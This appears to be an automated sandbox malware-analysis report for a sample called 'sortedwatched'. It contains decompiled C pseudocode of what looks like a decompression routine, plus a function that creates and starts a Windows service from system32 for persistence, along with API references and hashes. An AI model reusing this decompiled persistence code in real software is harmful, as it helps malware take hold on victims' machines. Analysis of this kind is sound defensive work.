                  																	 *_t1350 = 0x11;
                  																	goto L339;
                  																}
                  																goto L142;
                  															}
                  															_t1256 = _v12;
                  															 *((char*)(_t1256 +  &(_t1350[0xa49]))) = _v44;
                  															_t1247 = _t1256 + 1;
                  															goto L119;
                  														}
                  														_t1249 = _t1004 >> 9;
                  														_v44 = _t1004 & 0x000001ff;
                  														goto L138;
                  													}
                  													__eflags = _v36 - _t1288 - 2;
                  													if(_v36 - _t1288 >= 2) {
                  														_t1248 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  														_t1288 = _v16 + 2;
                  														_v8 = _t1248;
                  														_v16 = _t1288;
                  														_t1364 = _t1364 + 0x10;
                  														goto L126;
                  													}
                  													L122:
                  													_t1029 =  *((short*)(_t1350 + 0x1ca0 + (_v8 & 0x000003ff) * 2));
                  													_v40 = _t1029;
                  													__eflags = _t1029;
                  													if(_t1029 < 0) {
                  														__eflags = _t1364 - 0xa;
                  														if(_t1364 <= 0xa) {
                  															L132:
                  															__eflags = _t1288 - _v36;
                  															if(_t1288 >= _v36) {
                  																 *_t1350 = 0x10;
                  																goto L335;
                  															}
                  															_t1031 = ( *_t1288 & 0x000000ff) << _t1364;
                  															_t1288 = _t1288 + 1;
                  															_t1364 = _t1364 + 8;
                  															_t1248 = _v8 | _t1031;
                  															_v16 = _t1288;
                  															_v8 = _t1248;
                  															__eflags = _t1364 - 0xf;
                  															if(_t1364 < 0xf) {
                  																goto L122;
                  															}
                  															goto L126;
                  														}
                  														_t1263 = 0xa;
                  														_v28 = _t1263;
                  														while(1) {
                  															_t1266 =  *((short*)(_t1350 + 0x24a0 + ((_v8 >> _t1263 & _v24) +  !_v40) * 2));
                  															_t1037 = _v28 + 1;
                  															_v40 = _t1266;
                  															_v28 = _t1037;
                  															__eflags = _t1266;
                  															if(_t1266 >= 0) {
                  																goto L125;
                  															}
                  															_t1263 = _v28;
                  															__eflags = _t1364 - _t1037 + 1;
                  															if(_t1364 >= _t1037 + 1) {
                  																continue;
                  															}
                  															goto L132;
                  														}
                  														goto L125;
                  													}
                  													_t1039 = _t1029 >> 9;
                  													__eflags = _t1039;
                  													if(_t1039 == 0) {
                  														goto L132;
                  													}
                  													__eflags = _t1364 - _t1039;
                  													if(_t1364 < _t1039) {
                  														goto L132;
                  													}
                  													goto L125;
                  												}
                  												_t1375 = _v52;
                  												do {
                  													_t1315 = 0;
                  													_t1267 =  *(_t1375 + _v20) & 0x000000ff;
                  													_v52 = _t1267;
                  													__eflags = _t1267;
                  													if(_t1267 == 0) {
                  														goto L115;
                  													}
                  													_t1124 =  *(_t1378 + _t1267 * 4 - 0x90);
                  													_v28 = _t1267;
                  													 *(_t1378 + _t1267 * 4 - 0x90) = _t1124 + 1;
                  													do {
                  														_t1315 = _t1315 + _t1315 | _t1124 & _v24;
                  														_t1124 = _t1124 >> 1;
                  														_t1044 = _v28 - 1;
                  														_v28 = _t1044;
                  														__eflags = _t1044;
                  													} while (_t1044 != 0);
                  													_t1270 = _v52;
                  													__eflags = _t1270 - 0xa;
                  													if(_t1270 > 0xa) {
                  														_t1046 = _t1315 & 0x000003ff;
                  														_t1124 =  *(_v20 + 0x120 + _t1046 * 2);
                  														_v28 = _t1124;
                  														__eflags = _t1124;
                  														if(_t1124 == 0) {
                  															_t1128 = _v40;
                  															_v28 = _t1128;
                  															 *(_v20 + 0x120 + _t1046 * 2) = _t1128;
                  															_t1124 = _t1128 - 2;
                  															__eflags = _t1124;
                  															_t1350 = _v64;
                  															_v40 = _t1124;
                  														}
                  														_t1317 = _t1315 >> 9;
                  														__eflags = _t1270 - 0xb;
                  														if(_t1270 <= 0xb) {
                  															L114:
                  															_t1320 = (_t1317 >> 0x00000001 & _v24) - _v28;
                  															__eflags = _t1320;
                  															 *(_v20 + 0x91e + _t1320 * 2) = _t1375;
                  															goto L115;
                  														} else {
                  															_t1355 = _v24;
                  															_t244 = _t1270 - 0xb; // -11
                  															_t1127 = _t244;
                  															_t1271 = _v28;
                  															do {
                  																_t1317 = _t1317 >> 1;
                  																_t1051 = 0x48f - _t1271 - (_t1317 & _t1355);
                  																_t1274 =  *(_v20 + 0x91e) & 0x0000ffff;
                  																__eflags = _t1274;
                  																if(_t1274 != 0) {
                  																	_t1271 = _t1274;
                  																} else {
                  																	_t1271 = _v40;
                  																	 *(_v20 + _t1051 * 2) = _t1271;
                  																	_t1355 = _v24;
                  																	_v40 = _t1271 - 2;
                  																}
                  																_t1127 = _t1127 - 1;
                  																__eflags = _t1127;
                  															} while (_t1127 != 0);
                  															_t1350 = _v64;
                  															_v28 = _t1271;
                  															goto L114;
                  														}
                  													}
                  													_v52 = (_t1270 << 0x00000009 | _t1375) & 0x0000ffff;
                  													__eflags = _t1315 - 0x400;
                  													if(_t1315 >= 0x400) {
                  														goto L115;
                  													}
                  													_t1358 = _v52;
                  													_t1124 = _v24 << _t1270;
                  													_t1060 = _v20 + _t1315 * 2 + 0x120;
                  													__eflags = _t1060;
                  													_t1275 = _t1124 + _t1124;
                  													do {
                  														 *_t1060 = _t1358;
                  														_t1315 = _t1315 + _t1124;
                  														_t1060 = _t1060 + _t1275;
                  														__eflags = _t1315 - 0x400;
                  													} while (_t1315 < 0x400);
                  													_t1350 = _v64;
                  													L115:
                  													_t1041 = _t1350[6];
                  													_t1375 = _t1375 + 1;
                  													__eflags = _t1375 -  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4));
                  												} while (_t1375 <  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4)));
                  												_t1364 = _v48;
                  												_t1113 = _t1124 | 0xffffffff;
                  												__eflags = _t1113;
                  												goto L117;
                  											}
                  											__eflags = _v28 - _v24;
                  											if(_v28 > _v24) {
                  												_t1288 = _v16;
                  												L285:
                  												_v20 = _t1113;
                  												 *_t1350 = 0x23;
                  												goto L339;
                  											}
                  											goto L95;
                  										}
                  										_t1123 = _v20;
                  										do {
                  											 *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) =  *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) + 1;
                  											_t1244 = _t1244 + 1;
                  											__eflags = _t1244 -  *(_t1350 + 0x2c + _t1304 * 4);
                  										} while (_t1244 <  *(_t1350 + 0x2c + _t1304 * 4));
                  										_t1113 = _t1123 | 0xffffffff;
                  										__eflags = _t1113;
                  										goto L91;
                  									}
                  									__eflags = _t1364 - 3;
                  									if(_t1364 >= 3) {
                  										L80:
                  										_t135 = _t864 + 0x411a34; // 0x121110
                  										_t1277 = _t1303 & 0x00000007;
                  										_t1303 = _t1303 >> 3;
                  										_t1364 = _t1364 - 3;
                  										_v8 = _t1303;
                  										_v48 = _t1364;
                  										 *( &(_t1350[0x6e0]) + ( *_t135 & 0x000000ff)) = _t1277;
                  										_t864 = _v12 + 1;
                  										goto L74;
                  									}
                  									_t1288 = _v16;
                  									while(1) {
                  										L77:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t1066 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t1066;
                  										_t1364 = _t1364 + 8;
                  										_v16 = _t1288;
                  										__eflags = _t1364 - 3;
                  										if(_t1364 < 3) {
                  											continue;
                  										}
                  										_t864 = _v12;
                  										_t1303 = _v8;
                  										goto L80;
                  									}
                  									 *_t1350 = 0xe;
                  									goto L335;
                  								}
                  								_t1067 = 0x20;
                  								_t1350[0xc] = _t1067;
                  								_t1376 =  &(_t1350[0x10]);
                  								_t1350[0xb] = 0x120;
                  								memset( &(_t1350[0x378]), 5, _t1067);
                  								_t1359 = _v80;
                  								E0040FDD0(_t1376, 8, _t1359);
                  								_t1377 = _t1376 + _t1359;
                  								E0040FDD0(_t1377, 9, 0x70);
                  								_t1279 = 6;
                  								memset(_t1377 + 0x70, 0x7070707, _t1279 << 2);
                  								_t1379 = _t1379 + 0x30;
                  								_t1350 = _v64;
                  								 *((intOrPtr*)(_t1377 + 0x88)) = 0x8080808;
                  								 *((intOrPtr*)(_t1377 + 0x8c)) = 0x8080808;
                  								_t1364 = _v48;
                  								goto L86;
                  							}
                  							_t1075 = _t770 - 1;
                  							__eflags = _t1075;
                  							if(_t1075 == 0) {
                  								goto L304;
                  							}
                  							_t1077 = _t1075;
                  							__eflags = _t1077;
                  							if(_t1077 == 0) {
                  								_t1119 = _v8;
                  								goto L322;
                  							}
                  							_t1078 = _t1077 - 1;
                  							__eflags = _t1078;
                  							if(_t1078 == 0) {
                  								_t1119 = _v8;
                  								goto L327;
                  							}
                  							_t1079 = _t1078 - 9;
                  							__eflags = _t1079;
                  							if(_t1079 == 0) {
                  								goto L270;
                  							}
                  							_t1080 = _t1079 - 1;
                  							__eflags = _t1080;
                  							if(_t1080 == 0) {
                  								_t846 = _v44;
                  								goto L276;
                  							}
                  							__eflags = _t1080 == 1;
                  							if(_t1080 == 1) {
                  								goto L235;
                  							}
                  							goto L343;
                  						}
                  						if(__eflags == 0) {
                  							goto L296;
                  						}
                  						_t1082 = _t769 - 0x19;
                  						__eflags = _t1082;
                  						if(_t1082 == 0) {
                  							goto L201;
                  						}
                  						_t1083 = _t1082 - 1;
                  						__eflags = _t1083;
                  						if(_t1083 == 0) {
                  							goto L217;
                  						}
                  						_t1084 = _t1083 - 1;
                  						__eflags = _t1084;
                  						if(_t1084 == 0) {
                  							goto L226;
                  						}
                  						_t1085 = _t1084 - 5;
                  						__eflags = _t1085;
                  						if(_t1085 == 0) {
                  							goto L306;
                  						}
                  						_t1087 = _t1085;
                  						__eflags = _t1087;
                  						if(_t1087 == 0) {
                  							goto L333;
                  						}
                  						_t1088 = _t1087 - 1;
                  						__eflags = _t1088;
                  						if(_t1088 == 0) {
                  							goto L285;
                  						}
                  						__eflags = _t1088 != 1;
                  						if(_t1088 != 1) {
                  							goto L339;
                  						}
                  						L49:
                  						_v20 = _t1113;
                  						 *_t1350 = 0x24;
                  						goto L339;
                  					}
                  					if(_t1384 == 0) {
                  						_t873 = _v12;
                  						goto L194;
                  					}
                  					_t1385 = _t769 - 0xa;
                  					if(_t1385 > 0) {
                  						_t1090 = _t769 - 0xb;
                  						__eflags = _t1090;
                  						if(_t1090 == 0) {
                  							goto L81;
                  						}
                  						_t1091 = _t1090 - 3;
                  						__eflags = _t1091;
                  						if(_t1091 == 0) {
                  							goto L77;
                  						}
                  						_t1093 = _t1091;
                  						__eflags = _t1093;
                  						if(_t1093 == 0) {
                  							goto L132;
                  						}
                  						_t1094 = _t1093 - 1;
                  						__eflags = _t1094;
                  						if(_t1094 == 0) {
                  							goto L287;
                  						}
                  						_t1095 = _t1094 - 1;
                  						__eflags = _t1095;
                  						if(_t1095 == 0) {
                  							goto L143;
                  						}
                  						_t1096 = _t1095 - 3;
                  						__eflags = _t1096;
                  						if(_t1096 == 0) {
                  							goto L290;
                  						}
                  						__eflags = _t1096 == 0;
                  						if(_t1096 == 0) {
                  							goto L185;
                  						}
                  						goto L339;
                  					}
                  					if(_t1385 == 0) {
                  						goto L298;
                  					}
                  					if(_t769 > 9) {
                  						goto L343;
                  					}
                  					switch( *((intOrPtr*)(_t769 * 4 +  &M00405E60))) {
                  						case 0:
                  							_t1099 = _v28;
                  							_t1170 = _t1099;
                  							_t1350[3] = _t1099;
                  							_t1364 = _t1099;
                  							_t1350[2] = _t1099;
                  							_v56 = _t1099;
                  							_v12 = _t1099;
                  							_v44 = _t1099;
                  							_t1100 = _v24;
                  							_v8 = _t1170;
                  							_t1350[7] = _t1100;
                  							_t1350[4] = _t1100;
                  							if((_a20 & _t1100) == 0) {
                  								goto L66;
                  							}
                  							goto L12;
                  						case 1:
                  							L12:
                  							_t1281 = _v36;
                  							_t1101 = _t1288;
                  							if(_t1101 < _t1281) {
                  								_t1288 = _t1288 + 1;
                  								_t1350[2] =  *_t1101 & 0x000000ff;
                  								goto L16;
                  							}
                  							_t772 = _v24;
                  							 *_t1350 = _t772;
                  							goto L336;
                  						case 2:
                  							__ecx = _v36;
                  							L16:
                  							__eflags = _t1288 - _t1281;
                  							if(_t1288 < _t1281) {
                  								_t1103 =  *_t1288 & 0x000000ff;
                  								_t1282 = _t1350[2];
                  								_v28 = _t1103;
                  								_t1350[3] = _t1103;
                  								_t1106 = (_t1282 << 8) + _v28;
                  								_v16 = _t1288 + 1;
                  								_v40 = 0x1f;
                  								__eflags = _t1106 % _v40;
                  								if(_t1106 % _v40 != 0) {
                  									L23:
                  									_t1348 = _v24;
                  									_t1108 = _t1348;
                  									L24:
                  									__eflags = _v52;
                  									_v12 = _t1108;
                  									if(_v52 != 0) {
                  										L30:
                  										_t1288 = _v16;
                  										__eflags = _t1108;
                  										if(_t1108 != 0) {
                  											goto L49;
                  										}
                  										goto L63;
                  									}
                  									_t1349 = _t1348 << (_t1282 >> 4) + 8;
                  									__eflags = _t1349 - 0x8000;
                  									if(_t1349 > 0x8000) {
                  										L28:
                  										_t1285 = _v24;
                  										L29:
                  										_t1108 = _t1108 | _t1285;
                  										__eflags = _t1108;
                  										_v12 = _t1108;
                  										goto L30;
                  									}
                  									_push(0xffffffff);
                  									_pop(_t1113);
                  									__eflags = _v68 + 1 - _t1349;
                  									if(_v68 + 1 < _t1349) {
                  										goto L28;
                  									}
                  									_t1285 = 0;
                  									goto L29;
                  								}
                  								__eflags = _v28 & 0x00000020;
                  								if((_v28 & 0x00000020) != 0) {
                  									goto L23;
                  								}
                  								__eflags = (_t1282 & 0x0000000f) - 8;
                  								if((_t1282 & 0x0000000f) != 8) {
                  									goto L23;
                  								}
                  								_t1348 = _v24;
                  								_t1108 = 0;
                  								goto L24;
                  							}
                  							_push(2);
                  							_pop(_t1111);
                  							__eflags = _a20 & _t1111;
                  							_push(0xfffffffc);
                  							_pop(_t1131);
                  							_t1113 =  !=  ? _v24 : _t1131;
                  							 *_t1350 = _t1111;
                  							goto L18;
                  						case 3:
                  							goto L64;
                  						case 4:
                  							goto L339;
                  						case 5:
                  							goto L251;
                  						case 6:
                  							goto L258;
                  						case 7:
                  							goto L262;
                  						case 8:
                  							__ecx = _v32;
                  							goto L279;
                  					}
                  				}
                  			}
                  0x004054cf
                  0x0040561e
                  0x0040561e
                  0x0040561e
                  0x00000000
                  0x0040561e
                  0x004054d5
                  0x004054d8
                  0x004054db
                  0x00000000
                  0x004054db
                  0x00405486
                  0x00405409
                  0x00404f75
                  0x00404f7f
                  0x00404f95
                  0x00404fab
                  0x00404fb1
                  0x00404fb4
                  0x00404fb6
                  0x00404fb9
                  0x00404fbd
                  0x00404fd7
                  0x00404fd7
                  0x00404fdb
                  0x00404fdd
                  0x00404fe3
                  0x00404fe3
                  0x00404fe3
                  0x00404feb
                  0x00404fec
                  0x00404fec
                  0x00404ff5
                  0x00404ff8
                  0x00404ffa
                  0x00405001
                  0x00405004
                  0x00405004
                  0x00405009
                  0x0040500f
                  0x0040501d
                  0x0040501d
                  0x00405020
                  0x00405024
                  0x00405027
                  0x0040502c
                  0x0040516a
                  0x0040516a
                  0x0040516e
                  0x0040539b
                  0x0040539b
                  0x00000000
                  0x0040539b
                  0x00405174
                  0x00405174
                  0x00405176
                  0x0040517c
                  0x0040517f
                  0x00405181
                  0x00405361
                  0x00405363
                  0x00405ad2
                  0x00405ad5
                  0x00405ad5
                  0x00405ad8
                  0x00000000
                  0x00405ad8
                  0x00405377
                  0x00405388
                  0x00405388
                  0x00405392
                  0x00405398
                  0x00000000
                  0x00405398
                  0x00405187
                  0x0040518a
                  0x0040518d
                  0x004051bf
                  0x004051bf
                  0x004051c2
                  0x004051c9
                  0x004051d1
                  0x004051d4
                  0x004051d6
                  0x00405283
                  0x00405284
                  0x00405287
                  0x0040528f
                  0x00405292
                  0x00405293
                  0x0040529b
                  0x0040529e
                  0x0040529e
                  0x004052a2
                  0x004052a5
                  0x004052a7
                  0x004052a9
                  0x004052ac
                  0x004052af
                  0x004052b2
                  0x004052b5
                  0x004052ca
                  0x004052d6
                  0x004052d6
                  0x004052dd
                  0x004052e0
                  0x004052e2
                  0x00405308
                  0x0040530b
                  0x00405310
                  0x00405317
                  0x0040531a
                  0x0040531d
                  0x00405324
                  0x00405326
                  0x00405329
                  0x0040532c
                  0x0040532f
                  0x0040533b
                  0x0040533b
                  0x00405331
                  0x00405331
                  0x00405331
                  0x00405347
                  0x00405350
                  0x00405353
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004052e4
                  0x004052e4
                  0x004052e4
                  0x004052e7
                  0x00000000
                  0x00000000
                  0x004052f2
                  0x004052f4
                  0x004052f5
                  0x004052f8
                  0x004052fb
                  0x004052fe
                  0x00405301
                  0x00405303
                  0x00000000
                  0x00000000
                  0x00405305
                  0x00000000
                  0x00405305
                  0x00405ac7
                  0x00000000
                  0x00405ac7
                  0x004052cc
                  0x004052d0
                  0x00405ab9
                  0x00405ab9
                  0x00405abc
                  0x00000000
                  0x00405abc
                  0x00000000
                  0x004052d0
                  0x004052b7
                  0x004052bd
                  0x004052c4
                  0x00000000
                  0x004052c4
                  0x004051de
                  0x004051e6
                  0x00000000
                  0x004051e6
                  0x00405194
                  0x00405197
                  0x0040526b
                  0x00405270
                  0x00405273
                  0x00405276
                  0x00405279
                  0x00000000
                  0x00405279
                  0x0040519d
                  0x004051a5
                  0x004051ad
                  0x004051b0
                  0x004051b2
                  0x004051ee
                  0x004051f1
                  0x00405226
                  0x00405226
                  0x00405229
                  0x00405aae
                  0x00000000
                  0x00405aae
                  0x00405234
                  0x00405236
                  0x0040523a
                  0x0040523d
                  0x0040523f
                  0x00405242
                  0x00405245
                  0x00405248
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040524e
                  0x004051f5
                  0x004051f6
                  0x004051f9
                  0x00405208
                  0x00405213
                  0x00405214
                  0x00405217
                  0x0040521a
                  0x0040521c
                  0x00000000
                  0x00000000
                  0x0040521e
                  0x00405222
                  0x00405224
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405224
                  0x00000000
                  0x004051f9
                  0x004051b4
                  0x004051b7
                  0x004051b9
                  0x00000000
                  0x00000000
                  0x004051bb
                  0x004051bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004051bd
                  0x00405032
                  0x00405035
                  0x00405038
                  0x0040503a
                  0x0040503e
                  0x00405041
                  0x00405043
                  0x00000000
                  0x00000000
                  0x00405049
                  0x00405050
                  0x00405056
                  0x0040505d
                  0x00405067
                  0x00405069
                  0x0040506b
                  0x0040506c
                  0x0040506f
                  0x0040506f
                  0x00405073
                  0x00405076
                  0x00405079
                  0x004050c6
                  0x004050cb
                  0x004050d3
                  0x004050d6
                  0x004050d8
                  0x004050dd
                  0x004050e0
                  0x004050e3
                  0x004050eb
                  0x004050eb
                  0x004050ee
                  0x004050f1
                  0x004050f1
                  0x004050f4
                  0x004050f7
                  0x004050fa
                  0x00405143
                  0x0040514b
                  0x0040514b
                  0x0040514e
                  0x00000000
                  0x004050fc
                  0x004050fc
                  0x004050ff
                  0x004050ff
                  0x00405102
                  0x00405105
                  0x00405105
                  0x00405112
                  0x00405117
                  0x0040511b
                  0x0040511e
                  0x00405137
                  0x00405120
                  0x00405123
                  0x00405126
                  0x0040512c
                  0x00405132
                  0x00405132
                  0x0040513a
                  0x0040513a
                  0x0040513a
                  0x0040513d
                  0x00405140
                  0x00000000
                  0x00405140
                  0x004050fa
                  0x00405085
                  0x00405088
                  0x0040508e
                  0x00000000
                  0x00000000
                  0x0040509a
                  0x0040509d
                  0x004050a2
                  0x004050a2
                  0x004050a7
                  0x004050aa
                  0x004050aa
                  0x004050ad
                  0x004050af
                  0x004050b1
                  0x004050b1
                  0x004050b9
                  0x00405156
                  0x00405156
                  0x00405159
                  0x0040515a
                  0x0040515a
                  0x00405164
                  0x00405167
                  0x00405167
                  0x00000000
                  0x00405167
                  0x00405014
                  0x00405017
                  0x00405a9d
                  0x00405aa0
                  0x00405aa0
                  0x00405aa3
                  0x00000000
                  0x00405aa3
                  0x00000000
                  0x00405017
                  0x00404fbf
                  0x00404fc2
                  0x00404fc6
                  0x00404fcd
                  0x00404fce
                  0x00404fce
                  0x00404fd4
                  0x00404fd4
                  0x00000000
                  0x00404fd4
                  0x00404e9e
                  0x00404ea1
                  0x00404ecb
                  0x00404ecb
                  0x00404ed4
                  0x00404ed7
                  0x00404eda
                  0x00404edd
                  0x00404ee0
                  0x00404ee3
                  0x00404eed
                  0x00000000
                  0x00404eed
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6
                  0x00404ea6
                  0x00404ea9
                  0x00000000
                  0x00000000
                  0x00404eb4
                  0x00404eb6
                  0x00404eb7
                  0x00404eba
                  0x00404ebd
                  0x00404ec0
                  0x00404ec3
                  0x00000000
                  0x00000000
                  0x00404ec5
                  0x00404ec8
                  0x00000000
                  0x00404ec8
                  0x00405a92
                  0x00000000
                  0x00405a92
                  0x00404e06
                  0x00404e08
                  0x00404e0b
                  0x00404e14
                  0x00404e1e
                  0x00404e24
                  0x00404e2b
                  0x00404e32
                  0x00404e37
                  0x00404e49
                  0x00404e4a
                  0x00404e4a
                  0x00404e4c
                  0x00404e54
                  0x00404e5a
                  0x00404e60
                  0x00000000
                  0x00404e60
                  0x00404d1e
                  0x00404d1e
                  0x00404d1f
                  0x00000000
                  0x00000000
                  0x00404d26
                  0x00404d26
                  0x00404d27
                  0x00405c30
                  0x00000000
                  0x00405c30
                  0x00404d2d
                  0x00404d2d
                  0x00404d2e
                  0x00405c63
                  0x00000000
                  0x00405c63
                  0x00404d34
                  0x00404d34
                  0x00404d37
                  0x00000000
                  0x00000000
                  0x00404d3d
                  0x00404d3d
                  0x00404d3e
                  0x00405a3f
                  0x00000000
                  0x00405a3f
                  0x00404d44
                  0x00404d45
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404d4b
                  0x00404ccf
                  0x00000000
                  0x00000000
                  0x00404cd5
                  0x00404cd5
                  0x00404cd8
                  0x00000000
                  0x00000000
                  0x00404cde
                  0x00404cde
                  0x00404cdf
                  0x00000000
                  0x00000000
                  0x00404ce5
                  0x00404ce5
                  0x00404ce6
                  0x00000000
                  0x00000000
                  0x00404cec
                  0x00404cec
                  0x00404cef
                  0x00000000
                  0x00000000
                  0x00404cf6
                  0x00404cf6
                  0x00404cf7
                  0x00000000
                  0x00000000
                  0x00404cfd
                  0x00404cfd
                  0x00404cfe
                  0x00000000
                  0x00000000
                  0x00404d04
                  0x00404d05
                  0x00000000
                  0x00000000
                  0x00404d0b
                  0x00404d0b
                  0x00404d0e
                  0x00000000
                  0x00404d0e
                  0x00404b80
                  0x00405604
                  0x00000000
                  0x00405604
                  0x00404b86
                  0x00404b89
                  0x00404c8c
                  0x00404c8c
                  0x00404c8f
                  0x00000000
                  0x00000000
                  0x00404c95
                  0x00404c95
                  0x00404c98
                  0x00000000
                  0x00000000
                  0x00404c9f
                  0x00404c9f
                  0x00404ca0
                  0x00000000
                  0x00000000
                  0x00404ca6
                  0x00404ca6
                  0x00404ca7
                  0x00000000
                  0x00000000
                  0x00404cad
                  0x00404cad
                  0x00404cae
                  0x00000000
                  0x00000000
                  0x00404cb4
                  0x00404cb4
                  0x00404cb7
                  0x00000000
                  0x00000000
                  0x00404cbe
                  0x00404cbf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404cc5
                  0x00404b8f
                  0x00000000
                  0x00000000
                  0x00404b98
                  0x00000000
                  0x00000000
                  0x00404b9e
                  0x00000000
                  0x00404ba5
                  0x00404ba8
                  0x00404baa
                  0x00404bad
                  0x00404baf
                  0x00404bb2
                  0x00404bb5
                  0x00404bb8
                  0x00404bbb
                  0x00404bbe
                  0x00404bc1
                  0x00404bc4
                  0x00404bca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404bd0
                  0x00404bd0
                  0x00404bd3
                  0x00404bd7
                  0x00404be6
                  0x00404be7
                  0x00000000
                  0x00404be7
                  0x00404bd9
                  0x00404bdc
                  0x00000000
                  0x00000000
                  0x00404bec
                  0x00404bef
                  0x00404bef
                  0x00404bf1
                  0x00404c0a
                  0x00404c0e
                  0x00404c11
                  0x00404c14
                  0x00404c1c
                  0x00404c1f
                  0x00404c24
                  0x00404c2e
                  0x00404c30
                  0x00404c47
                  0x00404c47
                  0x00404c4a
                  0x00404c4c
                  0x00404c4c
                  0x00404c50
                  0x00404c53
                  0x00404c7c
                  0x00404c7c
                  0x00404c7f
                  0x00404c81
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c87
                  0x00404c5b
                  0x00404c5d
                  0x00404c63
                  0x00404c74
                  0x00404c74
                  0x00404c77
                  0x00404c77
                  0x00404c77
                  0x00404c79
                  0x00000000
                  0x00404c79
                  0x00404c69
                  0x00404c6b
                  0x00404c6c
                  0x00404c6e
                  0x00000000
                  0x00000000
                  0x00404c70
                  0x00000000
                  0x00404c70
                  0x00404c32
                  0x00404c36
                  0x00000000
                  0x00000000
                  0x00404c3c
                  0x00404c3e
                  0x00000000
                  0x00000000
                  0x00404c40
                  0x00404c43
                  0x00000000
                  0x00404c43
                  0x00404bf3
                  0x00404bf5
                  0x00404bf6
                  0x00404bf9
                  0x00404bfb
                  0x00404bfc
                  0x00404c00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a5d
                  0x00000000
                  0x00000000
                  0x00404b9e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$_memset
                  • String ID: $0HCw
                  • API String ID: 805054810-431550929
                  • Opcode ID: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction ID: 0f27d5521e96fbc1980188426f25ed571c9babf91149ddb257576a03cfef0b11
                  • Opcode Fuzzy Hash: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction Fuzzy Hash: 59D25D71E0461ADBDB18CFA9C9906AEBBB1FF49300F14416AD955F7380D738AA41CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 80%
                  			E0040F7A0() {
                  				char _v8;
                  				short _v528;
                  				void* _t24;
                  				int _t32;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t32 = 0;
                  				_v8 = 0;
                  				_t24 = OpenSCManagerW(0, 0, 0xf003f);
                  				if(_t24 != 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					 *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t33);
                  					L00401B09(_t34);
                  					_t35 = CreateServiceW(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0);
                  					if(_t35 != 0) {
                  						if(E0040F504(_t24,  &_v8) != 0) {
                  							 *0x41353c(_t35, 1, _v8);
                  							E00401532(_v8);
                  						}
                  					} else {
                  						_t35 = OpenServiceW(_t24, "sortedwatched", 0x10);
                  					}
                  					if(_t35 != 0) {
                  						_t32 = StartServiceW(_t35, _t32, _t32);
                  						CloseServiceHandle(_t35);
                  					}
                  					E0040F6D0(_t24);
                  					CloseServiceHandle(_t24);
                  				}
                  				return _t32;
                  			}


                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000104), ref: 0040F7B7
                  • _snwprintf.NTDLL ref: 0040F7EB
                  • CreateServiceW.ADVAPI32(00000000,sortedwatched,sortedwatched,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F816
                  • OpenServiceW.ADVAPI32(00000000,sortedwatched,00000010), ref: 0040F82A
                  • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,0040F111), ref: 0040F848
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040F85D
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F866
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F874
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 2587423728-1568575355
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 88%
                  			E00402F82(void* __ecx) {
                  				int _v8;
                  				int _v12;
                  				signed int _v16;
                  				signed char _v20;
                  				signed char _v24;
                  				int _v28;
                  				int _v32;
                  				intOrPtr _v36;
                  				char _v356;
                  				void _v676;
                  				int _t269;
                  				signed char _t283;
                  				signed char _t287;
                  				signed char _t291;
                  				signed int _t294;
                  				signed char _t297;
                  				signed int _t298;
                  				signed char _t301;
